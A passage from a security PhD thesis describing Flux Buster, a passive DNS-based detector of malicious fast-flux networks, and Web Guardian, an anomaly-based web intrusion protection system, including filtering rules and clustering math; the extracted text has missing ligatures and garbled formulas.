web browsers like Mozilla Firefox and Google Chrome, which leverage on the so-
called Google Safe Browsing API. This is an experimental web service through
which client applications may check website URLs against a blacklist of malicious
websites. Google regularly updates this blacklist, in order to quickly signal new
malicious websites and the related domain names. There is a good reason to trust
Google. Among all, it is the world's most important search engine: it has got a lot
of information and computational power to identify malicious websites.
On the other hand, malicious websites are increasingly hosted by means of fast
ux service networks. In such a way, cyber criminals may provide for a reliable
(malicious) service, which is inherently dicult to switch o. The rst research
contribution that we describe on this thesis is the ideation and development of Flux
Buster [Perdisci, Corona et al. (2009)]. Flux Buster is a research tool which is able
to detect fast ux service networks through passive analysis of trac collected from
Recursive Domain Name Servers (RDNS) on multiple Internet Service Provider
(ISP) networks. Our detection system is important for a variety of reasons. Firstly,
we may detect domain names which point to malicious websites through a more
advanced technique w.r.t. domain name blacklists. We may look for intersections
between the set of IP addresses resolved by a domain name and the set of known
ux agents (i.e. IP addresses of computers pertaining to malicious ux networks
detected by Flux Buster). If an intersection is found, the domain may be deemed as
suspicious and we may protect web users by denying the loading of the associated
URL. In this thesis, we will show that such an approach may contribute to email
spam ltering. In addition, we will show that Flux Buster is able to detect a wide
range of malicious websites which are not noticed by querying the Google Safe
Browsing API.
Furthermore, Flux Buster allows to get a clear view of most popular websites
supported by malicious ux networks. This is fundamental to understand the actual
impact of ux networks, independently from the way such websites are advertised
on the Internet. Finally, the passive approach to the detection of malicious ux
networks allows to detect them in a stealthy way. Contrary to previous work, there
is no interaction between our detection system and malicious networks. As we will
explain in Section 3.1.2, this means that for criminals it is more hard to disguise the
detection system.
As evidenced in Section 2.3.2, web application vulnerabilities represent a tremen-

dous threat for Internet security. The state-of-the-art defence against server-side web
attacks is represented by Web Application Firewalls (WAF). Such systems match
incoming web requests (which may contain web application inputs) against a pre-
dened set of security rules. If a violation is found they may perform some kind
of counteraction, e.g. drop or redirect the request. However, WAF present some
relevant problems. Firstly, due to the rule-based approach, WAF may detect and
provide protection against known attacks only. Secondly, even for simple web ap-
plications, it is tedious, complex and error prone to dene suitable rules to detect
and block web attacks. Web applications (and their inputs) are typically highly
customized depending on the service specication and the developer. Thus, security
rules must be customized depending on the web application, in order to be eective.
To cope with these issues, we studied and developed a research tool called Web
Guardian. Web Guardian is an anomaly-based Intrusion Protection System. The
key task of Web Guardian is to model the normal prole of web requests received
by the web server, without supervision. A relevant feature of Web Guardian is
the capability of handling esplicitly the presence of noise (attacks) in its training
set. The normal prole of web requests is described through a set of independent
models. Each model describes the statistic prole of a specic feature of the web
requests. In such a way, each model may be viewed as an anomaly sensor. A
counteraction module is employed to correlate models' outputs and dene the action
to be performed. This architecture has the following advantages:
• We may protect web services against either known and unknown attacks.
• Anomalies may identify the class of an attack: since models are highly spe-
cialized, the set of anomalies may identify the typology of the attack. This
is important to provide for well-suited counteractions and support forensics
procedures.
• Reduced learning time: a multi-model approach allows for a reduction of the

complexity of the learning task on each single model and avoids the well-known
curse of dimensionality problem.
• Extensibility: it is easy to extend Web Guardian with new models that take
into account other features of web requests
In this thesis, we will show that Web Guardian is able to detect simple as well
as sophisticated attacks against web servers and web applications. False alarms
are very few and counteractions may be tuned to have a negligible probability of
aecting legitimate web requests, yet retaining their eectiveness against malicious
web requests. In any case, through a web interface, the security administrator
may easily adjust probability thresholds to cope with false alarms. Web Guardian
represents an extension and the evolution of HMM Web [Corona et al. (2009)], and
it is presented in Chapter 4.
2.5. Research contributions of this thesis 19
Flux Buster and Web Guardian represent Intrusion Detection Systems (as de-
ned in Section 1.3)
2 that we propose to enhance the state-of-the-art Internet
(web) security. However, in this thesis we present another signicant, more general,
research contribution.
The eectiveness of any Intrusion Detection System (IDS) depends upon the
IDS operating environment. This environment is constantly evolving and pregures
an hostile component which is due to the presence of an adversary. This is clear
from the discussion in Section 2.4. The adversary is willing to evade or compromise
the security tool, reduce the accuracy of its results or divert its expected behavior.
The eectiveness of IDSs during the time is strictly related to their capability to
cope with an adversary having these goals. Thus, we believe that the design of
future IDSs must necessarily address this issue. Nevertheless, this is not a trivial
problem. Many research works highlighted open issues or proposed new solutions
related to this problem. Unfortunately, such works typically focused on specic
topics, discussed about attacks against specic IDSs and often used dierent terms
for same general concepts. As a consequence, an overall picture of the problem is
still lacking.
Thus, in Chapter 5, we critically review related work both in terms of problem
formulation, contributions and proposed solutions. Then, we highlight the pros and
the cons of each one of the main IDS typologies, and suggest how to address the cons.
Our study may be employed as a reference to either design robust IDS solutions or
evaluate the quality of dierent IDS solutions, depending on the specic intrusion
detection task. As we will see, the design of Flux Buster and Web Guardian reects
many of the key features of adversary-aware IDS solutions.
2
Flux Buster may be considered an IDS, if we consider fast ux networks as violations of Internet
security policies.
Chapter 3
Protecting web users
Throughout history, technological innovations have changed

the power balance between attacker and defender. Technology
can give the advantage to one party or to another and new
attacks may be possible against technological advanced systems
that were not possible against older, simpler systems.
Bruce Schneier
As mentioned in Section 2.5, fast ux service networks are increasingly adopted
to host malicious websites, supporting any kind of scam. The robustness and the
pervasiveness of such malicious networks make the remediation and thus the protec-
tion against these websites a really hard problem. Nevertheless, even if we cannot
easily remediate these websites, we propose to protect web users by preventing the
loading of websites whose domain names resolve to ux networks. To this end, we
studied and developed Flux Buster, a research tool which has been developed in
collaboration with Damballa, Inc. and Georgia Tech Information Security
Center, Atlanta, USA. Flux Buster is an advanced system for the detection of fast
ux networks.
This chapter is organized as follows. First, in Section 3.1 we introduce the reader
to fast ux networks, previous work on the detection of such networks, as well as
the key contributions of our work. Then, in Section 3.2 we present more in detail
Flux Buster and evaluate its performance.
Subsequently, in Section 3.4 we employ Flux Buster in a operational setting.
We show how the output of Flux Buster may improve the detection of malicious
websites provided by the Google Safe Browsing API, the state-of-the-art protec-
tion adopted by most popular web browsers. Furthermore, we show how our system
may benet spam ltering applications. Finally, in Section 3.4.3 we discuss about
limitations of Flux Buster, as well as some possible ways of improvement.
3.1 Introduction
3.1.1 Content Delivery Networks
Most of high-prole organizations, such as Google, Microsoft, Yahoo!, Amazon
employ legitimate Content Delivery Networks (CDNs) to oer their Internet services
22 Chapter 3. Protecting web users
world-wide. These networks allow to optimize the content delivery of high-volume

Internet services, with high degree of availability, scalability and performance. A
CDN usually consists of a relatively large number of nodes scattered in multiple
locations around the world. Whenever a user requests a service provided through a
CDN, the CDN's node closest to the user is usually chosen to provide the requested
content with high performance [Hofmann and Beaumont (2005)]. The closest node
is automatically selected considering a number of features including geographical
distance between user and CDN's nodes, trac on each CDN node, bandwidth of
each CDN link. Each CDN's node replicates the content provided by a central
server, for example using web caching [Hofmann and Beaumont (2005)].
Figure 3.1 shows the basic functioning of a CDN. Assume a user tries to connect
to a website (e.g. http://www.google.com). Firstly, the browser tries to resolve
the related domain name (e.g. www.google.com). To this end, it queries the Recur-
sive Domain Name Server (RDNS) provided by the user's Internet Service Provider
(ISP). Then, the RDNS may query various DNS until reaching the authoritative
DNS for the specic domain name. The authoritative DNS server, according to the
current state of the CDN, and the geographical position of the request source, replies
with one or more IP addresses corresponding to the closest CDN's nodes. Sub-
sequently, the RDNS forwards this list to the user's browser. Finally, the browser
sends a HTTP GET message to the rst IP address in this list, retrieving the HTTP
response (e.g. which contains the main Google page). Typically, only if the rst IP
address is not reachable, the browser will contact other IP addresses in the list.
It is worth noting that the list of IP addresses is valid only for a limited period
of time, dened by the Time To Live (TTL) parameter. In the example of g. 3.1,
this value is 50 seconds. Thus, this list is stored (cached) by the RDNS only for
50 seconds. If the browser sends another DNS query for the same website within
this interval, the RDNS won't further contact the authorithative DNS. Instead, in
order to redistribute the load among equivalent nodes, the RDNS will return the
same list of IP addresses, but in a dierent order, e.g. following a Round-Robin
algorithm [Brisco (1995)]. After TTL seconds, if the user wants to connect to the
same website, all the process above is repeated. In general, relatively low TTL
values (e.g. 20 or 50 seconds) are necessary to provide users with an updated list of
nodes, in order to optimize the content delivery process.
3.1.2 Malicious fast ux service networks

Internet miscreants and cyber-criminals are always looking for new ways to cover the
traces of their malicious activities while preserving their illicit revenues. To this end,
malicious ux service networks have recently started to thrive [SAC (2008)]. Mali-
cious ux service networks can be viewed as illegitimate content-delivery networks
(CDNs).
Dierently from legitimate CDNs, whose nodes are professionally administered

machines, the nodes of a malicious ux service network, a.k.a. ux agents, are
represented by malware-infected machines. Most bot malware (i.e., the malicious
3.1. Introduction 23
Figure 3.1: Basic functioning of a Content Delivery Network. The user retrieves the
main Google page.
Figure 3.2: Basic functioning of a malicious fast ux service network. The user
retrieves a fake facebook login page, advertised by means of an email very similar
to legitimate facebook emails.
software that turns a machine into a botnet member) is able to infect a high number
of machines around the world (e.g., through a worm-like propagation), in particu-
lar poorly administered home-user machines. The ux-agents are usually part of
a botnet and can be remotely controlled by the malware author, who is often re-
ferred to as the bot-herder. Actually, the bot-herder may just lease the use of (a
part of ) her botnet to a fast ux service operator (in the following, ux operator ).
This operator may work in collaboration with spammers, in order to advertise her
malicious websites through a variety of means (e.g. email spam, blog spam, search
engine spam) [SH (2010)]. The ux operator in turn may sell her illicit fast ux
service to a customer, e.g. to support a particular scam campaign [SAC (2008)].
Of course, more complex relationships are possible. The key point is that know-how
and organization of machiavellians miscreants makes this problem a tremendous and
pervasive threat.
In order to set up a ux service, the ux operator registers a number (hundreds
or even thousand) of so called fast-ux domain names. To this end, the operator
typically employs multiple domain name registrars world-wide. Domain names are
routinely registered by using stolen user credentials and paying with stolen credit
card numbers. Each registration associates a domain name with an authoritative
DNS. The authoritative DNS is a computer tightly controlled by the malicious
operator. For example, it may be a computer of the botnet (e.g. under leasing
purchase) with public IP address and high uptime. In such a way, whenever a RDNS
tries to resolve one of the registered domain names, it will nally query this computer
to get an updated list of IP addresses. The operator set up the authoritative DNS
so that this list reects the addresses of active ux agents. On the other hand,
each ux agent may be turned on and o at any moment by their owner. In other
words, it is dicult for the ux operator to control or predict the uptime of each
ux agent. Therefore, in order to provide malicious content with relatively high
availability and load balancing, authoritative DNS are usually congured to provide
a dierent (large) set of resolved IP addresses (i.e., of ux agents) at every new
DNS query, to increase the chance of returning at least one IP address that will be
reachable and able to provide the malicious content at any given time. In practice,
fast-ux domain names allow ux operators to apply light-weight load balancing of
content requests on a large number of ux agents, thus eectively accomplishing
high availability at the expense of the compromised nodes.
More complex network structures are possible. In some ux network schemes,
a number of ux agents may also act as authoritative name servers, namely the
servers that will be contacted directly by the RDNS resolver to obtain the list of
IPs associated to fast-ux domain names. Such ux networks are usually referred
to as double-ux [KYE (2007), SAC (2008)].
Malicious ux service networks are commonly used to host phishing websites,
illegal adult websites, or serve as malware propagation vectors, for example. Con-
sider the scenario of Figure 3.2, in which a malicious organization, the customer,
wants to steal facebook users' credentials for illicit purposes (e.g. advanced social
engineering [Mitnick (2002)]). The customer may pay a ux operator to set up the
whole scam. Firstly, the ux operator registers a number of domain names (e.g.
mysession21.com, · · · , sessionnew83.com, xsessionid.com) that resolve to her
ux agents, which will return a fake facebook login page. He contacts a spammer
to send a large number of phishing emails that signal a new message from a face-
book user (e.g. Rob), in order to attract web trac from victim users. This email
may look very similar to legitimate facebook notications, except that all the links
contain a fast ux domain name, e.g. login.facebook.sessionnew83.com. When
a user receives one of such emails and clicks on the advertised URL, her browser
will resolve the domain name login.facebook.sessionnew83.com and will be redi-
rected to one of the ux agents. The ux agents will then provide a web page that
looks just like the login interface on facebook.com, but has the ability to steal any
information provided by the user and submit it to the customer.
The ux agents may have two roles. In some cases they may function as trans-
parent web proxies to the real content provider machine, instead of storing the
malicious content locally. In the example above, this means that when the browser
is redirected to one of the ux agents to access the phishing login web page, the ux
agent will contact another machine under control of the ux operator, download
the malicious content and forward it to the user's browser. The machine that ac-
tually provides the malicious content through the ux agents is often referred to as
the mothership, as shown in Figure 3.2. Thus, when ux agents act as transparent
proxies they eectively hide the real source of the malicious content.
Besides oering high availability of malicious content, malicious ux networks

are very hard to block. Fast ux networks may contain hundreds or even thousands
of independent ux agents. This network architecture makes it harder for law en-
forcement to identify and shut down the actual source of malicious content. An
alternative would be to remediate the malware infection on each single ux agent.
Unfortunately, this is often extremely expensive, given the high number of malware-
compromised machines that (unintentionally) participate in malicious ux network.
Furthermore, these machines are often scattered across many nations, therefore re-
quiring a coordinated international response eort. Another possibility would be
to cancel fast ux domains' registration. However, this requires the collaboration
of domain name registrars world-wide, which is not an easy task. In any case, this
task is complicated by the fact that ux operators may register hundreds of new
ux domain names on a daily basis.
3.1.3 Detecting Fast Flux Service Networks

A number of approaches for detecting fast-ux domain names have been re-
cently studied in [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008),
Konte et al. (2009)], for example. To the best of our knowledge, these works dier
from each other in the number of features used to characterized fast ux domains
and the details of the classication algorithms, but are all limited to mainly studying
1
fast-ux domains advertised through email spam . In particular, given a dataset of
spam emails (typically captured by spam traps and lters), potential fast-ux do-
main names are identied by extracting them from the URLs found in the body
of these emails [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008),
Konte et al. (2009)]. Then, an active probing strategy is applied, which repeatedly
issues DNS queries to collect information about the set of resolved IP addresses
and to classify each domain name into either fast-ux or non-fast-ux. The work
in [Hu et al. (2009)] is in part dierent from other previous work, because it is not
limited to domains found in spam emails. Hu et al. [Hu et al. (2009)] propose to an-
alyze NetFlow information collected at border routers to identify redirection botnets,
which are a specic kind of botnets used to set up redirection ux service networks.
However, the information they extract from network ows is not able to detect ux
agents that are being used as transparent proxies, instead of redirection points. Also,
the work in [Hu et al. (2009)] is heavily based on a DNS analysis module that applies
active probing in a way very similar to [Holz et al. (2008), Passerini et al. (2008)],
in order to collect the information necessary to perform the classication of suspi-
cious domains collected from spam emails and the correlation with network ows
information.
3.1.3.1 Our contribution
Flux Buster adopts a novel, passive approach for detecting and tracking malicious
ux service networks. It is based on passive analysis of recursive DNS traces col-
lected from multiple large networks. In practice, as shown in Figure 3.3, we deploy a
sensor in front of the recursive DNS (RDNS) server of dierent networks, passively
monitor the DNS queries and responses from the users to the RDNS, and selectively
store information about potential fast-ux domains into a central DNS data collec-
tor. Since the amount of RDNS trac in large networks is often overwhelming, we
devised a number of preltering rules that aim at identifying DNS queries to poten-
tial fast-ux domain names, while discarding the remaining requests to legitimate
domain names. Our preltering stage is very conservative, nevertheless, it is able to
reduce the volume of the monitored DNS trac to a tractable amount without dis-
carding information about domain names actually related to malicious ux services.
Once information about potential malicious ux domains has been collected for a
certain epoch E (e.g., one day), we perform a more ne-grain analysis. First, we
apply a clustering process to the domain names collected during E , and we group to-
gether domain names that are related to each other. For example we group together
domain names that point to the same Internet service, are related to the same CDN,
or are part of the same malicious ux network. Once the monitored domain names
have been grouped, we classify these clusters of domains and the related monitored
resolved IP addresses as either being part of a malicious ux service network or
not. This is in contrast with most previous works, in which single domain names
1
The domain names found in domain blacklists and malware samples are also considered in
some works, but they are very few compared to the domain names extracted from spam emails.
Figure 3.3: RDNS Data Collection Architecture.
are considered independently from each other, and classied as either fast-ux or
non-fast-ux [Holz et al. (2008), Passerini et al. (2008), Konte et al. (2009)].
Our detection approach has a fundamental advantage, compared to previous

work. Passively monitoring live users' DNS trac oers a new vantage point, and
allows us to capture queries to ux domain names that are advertised through a vari-
ety of means, including for example blog spam [Mishne et al. (2005)], social websites
spam [Heymann et al. (2007)], search engine spam [Gyongyi et al. (2005)], and in-
stant messaging spam [Liu et al. (2005)], beside email spam and precompiled do-
main blacklists such as the ones used in [Holz et al. (2008), Passerini et al. (2008),
Nazario et al. (2008), Konte et al. (2009)]. Furthermore, dierently from the active
probing approach used in previous work [Holz et al. (2008), Passerini et al. (2008),
Nazario et al. (2008), Konte et al. (2009)], we passively monitor live users' trac
without interacting ourselves with the ux networks. Active probing of fast-ux do-
main names may be detected by the attacker, who controls the authoritative name
servers responsible for responding to DNS queries about her fast-ux domain names.
If the attacker detects that an active probing system is trying to track her malicious
ux service network, she may stop responding to queries coming from the probing
system to prevent unveiling further information. On the other hand, our detection
system is able to detect ux services in a stealthy way.
Finally, the active probing of fast-ux domains used in previous

work [Holz et al. (2008), Passerini et al. (2008), Nazario et al. (2008),
Konte et al. (2009)] is expensive. The reason is that the volume of new spam-
related domain names received every day by a typical spam trap is usually high, and
constantly probing all of them is sustainable only through a careful optimization of
3.2. Flux Buster 29
Figure 3.4: Overview of our detection system.
the probing algorithm and using a distributed architecture.
Goals and assumptions Flux Buster aims at detecting malicious ux networks
in-the-wild. It passively processes the RDNS trac generated by a large user base
(see Figure 3.3). We assume that during their normal Internet experience some of
these users will (intentionally or unintentionally) request malicious content served
through a ux network. In practice, given the large user base we are able to monitor,
it is very likely that at least some of these users will (unfortunately) fall victims of
malicious web content, and will therefore click on (and initiate DNS queries about)
ux domain names. We aim to detect such events, and track the ux domain
names and the IP address of the related ux agents contacted by the victims in
the monitored network. Since we perform passive analysis and we monitor real
users' activities, this allows us to stealthily detect and collect information about
popular malicious ux networks on the Internet, regardless of the method used
by ux operators to advertise the malicious content served by their ux networks.
This is important to provide a preemptive protection to web users against any scam
supported by malicious ux networks.
3.2 Flux Buster

Figure 3.4 presents an overview of our malicious ux service detection system. For
each RDNS sensor (see Figure 3.3), we monitor the sequence of DNS queries and
responses from/to the users' machines for a predened period of time, or epoch, E
(e.g., one day). The amount of DNS trac towards RDNS servers is often over-
whelming, even for medium- and small-size networks. Therefore, our detection
system rst applies a number of ltering rules to reduce the volume of trac to
be analyzed. Since we are only interested in ux domain names and their resolved
IPs, the trac volume reduction lter F1 is responsible for identifying DNS queries
2
that are most likely related to ux domains , while ltering out queries to domains
that are very unlikely to be uxing. A list L of candidate ux domain names is
2
In the remainder of this paper we will sometimes use domain in place of domain name, for
the sake of brevity.
kept in memory and updated periodically. This list contains historic information
about candidate ux domain names, namely the maximum TTL ever seen for each
domain name, the set of resolved IPs extracted from the DNS responses over time,
etc. At the end of every period ∆T < E (e.g., ∆T may be equal to a few hours),
the list of candidate ux domain names is checked by lter F2 to verify if they are
still likely to be ux domains, according to the collected historic information. For
example, F2 checks whether the set of resolved IPs returned by the RDNS for a
given domain name has grown during ∆T . In fact, if a domain name was queried
several times during ∆T , but no new resolved IP was observed, it is unlikely that
the domain name is associated to a malicious ux service. On the other hand, if the
set of resolved IPs returned by the RDNS for a certain domain name keeps changing
after every TTL, the domain name is considered a good candidate ux domain. The
domain names that are found not to be likely ux-related are pruned from the list
L.
At the end of each epoch E, the remaining candidate ux domains in L and
related historic information are transfered from the RDNS sensors to our Detector
machine (see Figure 3.3), where we perform further analysis. In particular, in this
phase we aim at clustering together domain names related to the same service. We
group domains according to their resolved IP sets. Namely, given two candidate ux
domain names, if their set of resolved IPs collected during the epoch E intersect
(i.e., the two domain names share a signicant fraction of resolved IPs), we consider
the two domain names as similar. Given this notion of IP-based similarity, we apply
a hierarchical clustering algorithm to group domain names that are related to each
other. In practice, each of the obtained clusters represents a separate candidate
ux service network. It is worth noting that lter F1 and F2 are very conservative.
They will accept domains related to malicious ux services, but may also accept
a number of domains related to legitimate services.
Some legitimate services, such as legitimate CDNs (e.g., Akamai, www.akamai.

com), NTP server pools (www.pool.ntp.org), IRC server pools, etc., are served
through sets of domain names that share some similarities with fast-ux domains.
For example, domains related to legitimate CDNs often have a very low TTL and
resolve to multiple IP addresses located in dierent networks. Also, domains re-
lated to NTP server pools use a very high number of IP addresses which change
periodically using a round-robin-like algorithm.
As a consequence, a cluster of domains may represent a malicious ux service,

a legitimate CDN, a pool of NTP servers, etc. Therefore, after clustering each
candidate ux service network (i.e., each cluster of domain names and the related
resolved IPs) is given to a service classier, which is trained to classify each cluster
into either malicious ux service or legitimate/non-ux service. In the following we
describe each single component of our detection system more in details.
3.2. Flux Buster 31
3.2.1 Trac Volume Reduction (F1)

In order to describe the trac volume reduction lter F1, we rst need to formally
dene how the DNS queries and related responses are represented by our system.
Let q (d) be a DNS query performed by a user at time ti to resolve the set of IP
addresses owned by domain name d. We formally dene the information in the
query and its related response as a tuple q (d) = (ti , T (d) , P(d) ), where T (d) is the
time-to-live (TTL) of the DNS response, and P
(d) is the set of resolved IPs returned
by the RDNS server. Also, let pref ix(P

(d) , 16) be the set of distinct /16 network
prexes extracted from P

(d) . For example, assuming P(d) ={10.0.1.12, 10.0.2.45,
10.3.2.119}, then pref ix(P(d) , 16) = {10.0, 10.3}.

In order to reduce the volume of DNS trac (see lter F1 in Figure 3.4) without
discarding information about the domain names that are most likely related to
malicious ux services, we use the following ltering rules. We accept only DNS
queries (and related responses) that respect all of the following constraints:
F1-a) T (d) 6 10800 seconds (i.e., 3 hours).
F1-b) |P(d) | > 3 OR T (d) 6 30.

|pref ix(P(d) ,16)|
F1-c) p= |P(d) |
> 1
3.
where p is the ratio between the number of distinct /16 network prexes and the
total number of resolved IPs. We now briey motivate the choice of these ltering
rules.
As mentioned in Section 3.1.2, ux domains are characterized by a low TTL,
which is usually in the order of a few minutes [KYE (2007)] and allows the set of
resolved IPs to change rapidly. Rule F1-a excludes all the queries to domain names
whose TTL exceeds three hours, because such domain names are unlikely to be
uxing. Rule F1-b takes into account the fact that DNS queries to ux domain
names usually return a relatively large number (> 3) of resolved IPs [KYE (2007)].
The reason for this is that, as mentioned in Section 3.1.2, the uptime of each ux
agent is not easily predictable. A large set of resolved IPs provides a sort of fault-
tolerance mechanism for the ux service. However, a similar result may also be
obtained by setting up ux domains that return a very small set of resolved IPs (e.g.,
only one per query) but have a very low TTL (e.g., equal or close to zero). This
way, if a ux agent is down, a new ux agent can be immediately discovered by
performing another DNS query, because the previous response will be quickly evicted
from the RDNS's cache. Rule F1-b takes into account both these scenarios. Rule
F1-c is motivated by the fact that the ux agents are often scattered across many
dierent networks and organizations (e.g., the infected machines may be scattered
across several dierent academic networks, ISP networks, enterprise networks, etc.).
On the other hand, most legitimate (non-ux) domain names resolve to IP addresses
residing in one or few dierent networks (e.g., IPs all residing in the same sub-
network of the organization that provides a legitimate Internet service). We use
the function pref ix(P(d) , 16) to estimate the number of dierent networks in which
3
the resolved IPs reside , and the ratio p (rule F1-c) allows us to identify queries to
domains that are very unlikely to be part of a malicious ux service.
3.2.2 Periodic List Pruning (F2)

While monitoring the recursive DNS trac, each sensor maintains a list L of candi-
date ux domain names. The list L stores historic information about the candidate
ux domains and is updated every time a DNS query passes lter F1. In order to
explain how L is updated, let us formally dene how a candidate ux domain name
is represented. At any time t, a candidate ux domain name d can be viewed as a
(d) (d) (d) (d)
tuple d = (ti , Qi , T̂i , Ri , Gi ), where ti is the time when the last DNS query
(d)
for d was observed, Qi is the total number of DNS queries related to d ever seen
(d) (d)
until ti , T̂i is the maximum TTL ever observed for d, Ri is the cumulative set
(d)
of all the resolved IPs ever seen for d until time ti , and Gi is a sequence of pairs
(d) (d) (d) (d)
{(tj , rj )}j=1..i , where rj = |Rj | − |Rj−1 |, i.e., the number of new resolved IPs
we observed at time tj , compared to the set of resolved IPs seen until tj−1 . We
(d) (d) (d)
store only the pairs {(tj , rj )}j=1..i for which rj > 0. Therefore Gi registers
when and how much the resolved IP set of d grew, until time ti . When a new DNS
query q
(d) = (t , T (d) , P(d) ) related to d passes lter F1, the data structure d ∈ L is
k
updated according to the information in q
(d) .
In order to narrow down the number of candidate ux domains and only consider
the ones that are most likely related to malicious ux services, the list L is pruned
at the end of every interval ∆T < E (e.g., every ∆T = 3 hours). That is, every ∆T
we check the status of each candidate ux domain d ∈ L. Let tj be the time when
(d)
|pref ix(Rj ,16)|
this pruning check occurs. Also, let p= (d) be the network prex ratio
|Rj |
(see Section 3.2.1) for the cumulative set of resolved IPs of d ever seen until tj . We
remove from L those domain names for which
(d) (d)
F2-a) Qj > 100 AND |Gj | < 3 AND (|Rj |65 OR p 6 0.5).
Rule F2-a lters out those domains for which we monitored more than 100 queries,
the cumulative set of resolved IPs didn't grow more than twice, the total number
of resolved IPs ever seen is low (6 5) or the network prex ratio p is low (6 0.5).
The lter F2 is justied by the characteristics of ux domain names described in
Section 3.1.2, and domain names that do not pass F2 are very unlikely to be related
to ux services.
3.2.3 Further Domain Filtering (F3, optional)

Before applying domain clustering we further narrow down the number of candidate
domain names using a set of ltering rules. This further ltering step is optional
3
Ideally, it would be better to decide if two IPs belong to two dierent networks by mapping
each IP to their AS number, and then compare the AS numbers. However, it may be hard to do
this eciently, and from our experience using /16 gives us a way to eciently compute a good
approximation of this result.
3.2. Flux Buster 33
and we mainly use it to reduce the amount of memory required by the clustering
algorithm. These ltering rules may be tuned (or eliminated) to accept more
domains for the clustering step if more memory was available. This additional
lter step reduces the average number of candidate ux domains to be clustered
of almost an order of magnitude (from 4 · 104 to 6 · 104 , to about 8 · 103 domains
per sensor). It is worth noting, though, that similarly to lter F1 and F2 the
ltering rules are still very conservative. In fact, from our experimental results we
noticed that even after this further ltering, the list of candidate domain names
still included all the domain names most likely related to malicious ux services,
along with domain names related to legitimate CDNs, pools of NTP servers, and
other legitimate services. As mentioned in Section 3.2, domain names related to
legitimate CDNs and pools of NTP servers, for example, share some similarities
with fast-ux domains, and given that our ltering rules are very conservative (i.e.,
they aim at not rejecting any potential ux domain, but may include also non-ux
domains) these domains tend to be included in our list of candidate ux domains.
In order to further narrow down the domain names to be processed by our domain
clustering algorithms, we apply an additional ltering step F3. We keep only the
domain names that respect any of the following ltering rules (see Section 3.2.2 for
the notation), where the subscript E indicates that the quantities are measured at
the end of the epoch E=1 day:
(d) (d)
F3-a) TE < 30 F3-b) |RE | > 10 F3-c) |GE | > 5
(d) (d)
F3-d) |RE | > 5 AND pE > 0.8 F3-e) pE > 0.5 AND TE 6 3600 AND |GE | > 10
3.2.4 Domain Clustering

At the end of each epoch E, we consider the list L of candidate ux domains, and
we group them according to similarities in their resolved IP sets. This clustering
step is motivated by the following reasons. Flux operators usually operate malicious
ux services using a (often large) number of fast-ux domain names that all point
to ux agents related to the same ux service. We speculate that one of the reasons
for this behavior is to evade domain blacklists (DBLs). During our study, we came
across a number of malicious ux services advertised through large sets of random-
looking domain names. The ux operator seemed to be registering many new
domain names every days to compensate for the older domain names that where
identied as malicious by security researchers and added to DBLs.
Our clustering approach groups together domain names that within an epoch
E (equal to one day in our experiments) resolved to a common set of IP ad-
dresses. To perform domain clustering of ux domains that are related to each
other, we use a single-linkage hierarchical clustering algorithm [Jain et al. (1988),
Jain et al. (1999)], which adopts a friends of friends clustering strategy. In order
to apply clustering on a set of domain names D = {d1 , d2 , ..dn }, we rst need to for-
mally dene a notion of similarity between them. We dened the following similarity
metrics between candidate ux domains. Given a two domains α and β, and their
cumulative set of resolved IP addresses collected during an epoch E, respectively
8000
6000
num. of clusters
4000
2000
0
0.0 0.2 0.4 0.6 0.8 1.0
cut height (h)
Figure 3.5: Cluster Analysis, Sensor 1.
R(α) and R(β) , we compute their similarity score as
|R(α) ∩ R(β) | 1
sim(α, β) = · ∈ [0, 1] (3.1)
|R ∪ R | 1 + e
(α) (β) γ−min(|R(α) |,|R(β) |)
The rst factor is the Jaccard index for sets R(α) and R(β) , which intuitively mea-
sures the similarity between the two cumulative sets of resolved IPs. The second
factor is a sigmoidal weight. In practices, the higher the minimum number of re-
solved IPs in R(α) or R(β) , the higher the sigmoidal weight. To better understand
the choice of this weight factor consider this example: |R(α) ∩ R(β) | = 1 and
if
|R(α) ∪ R(β) | = 4 or |R(α) ∩ R(β) | = 10 and |R(α) ∪ R(β) | = 40, the Jaccard index is
0.25 in both cases. However, in the second case we want the similarity to be higher
because there are 10 resolved IPs in common among the domains α and β, instead
of just one. We can also think of the second factor as a sort of condence on the
rst one. The parameter γ is chosen a priori, and is only used to shift the sigmoid
towards the right with respect to the x-axes. We set γ =3 in our experiments so
that if min(|R(α) |, |R(β) |) = 3 the weight factor will be equal to 0.5. As the min-
imum number of resolved IPs grows, the sigmoidal weight tends to its asymptotic
value of 1 (e.g., when min(|R(α) |, |R(β) |) = 10, the weight factor is equal to 0.999).
A similarity (or proximity) matrix P = {sij }i,j=1..n that consists of similari-
ties sij = sim(di , dj ) between each pair of domains (di , dj ) can then be computed.
The hierarchical clustering algorithm takes P as input and produces in output a
dendrogram (see example in Fig. 3.10), i.e., a tree-like data structure in which the
leaves represent the original domains in D, and the length of the edges represent
3.2. Flux Buster 35
7000
5000
num. of clusters
3000
0 1000
0.0 0.2 0.4 0.6 0.8 1.0
cut height (h)
Figure 3.6: Cluster Analysis, Sensor 2.
the distance between clusters [Jain et al. (1988)] (see example in Figure 3.10). The
(i)
single-linkage algorithm denes the similarity between two clusters Ci = {dk }k=1..ci
(j) (i) (j)
and Cj = {dh }h=1..cj as σi,j = maxl,m {sim(dl , dm )}. The obtained dendrogram
does not actually dene a partitioning of the domains into clusters, rather it de-
nes relationships among domains. A partitioning of the set D into clusters can
then be obtained by cutting the dendrogram at a certain hight h. The leafs that
form a connected sub-graph after the cut are considered part of the same clus-
ter [Jain et al. (1988)]. Of course, dierent values of the height of the cut h may
produce dierent clustering results. In order to choose the best dendrogram cut (i.e.,
the best clustering), we apply a clustering validation approach based on plateau re-
gions [Dugad et al. (1998)]. In practice we plot a graph that shows how the number
of clusters varies for varying hight of the cut, and we look for plateau (i.e., at) re-
gions in the graph. For example, consider Figure 3.5 and Figure 3.6. The two graph
are related to clusters of candidate ux domain names extracted from two dierent
RDNS sensors (see Section 3.3 for details). Both graphs are related to monitoring
the DNS trac from each sensor for one epoch E =1 day. The long plateau re-
gion between 0.1 and 0.7 shows that varying the cut height h does not signicantly
change the number of obtained clusters. This stability in the number of clusters can
be viewed as an indication of the fact that by cutting the dendrogram at an height
h ∈ [0.1, 0.7] we would obtain a sort of natural grouping of the domain names.
A manual validation of the clusters obtained using this analysis strategy conrmed
that the obtained clusters were indeed correct. We will discuss the clustering results
more in detail in Section 3.3.
3.2.5 Service Classier

Each cluster Ci of candidate ux domains can be seen as a candidate ux service de-
ned by the set of all the domain names in Ci , and the overall set of IP addresses these
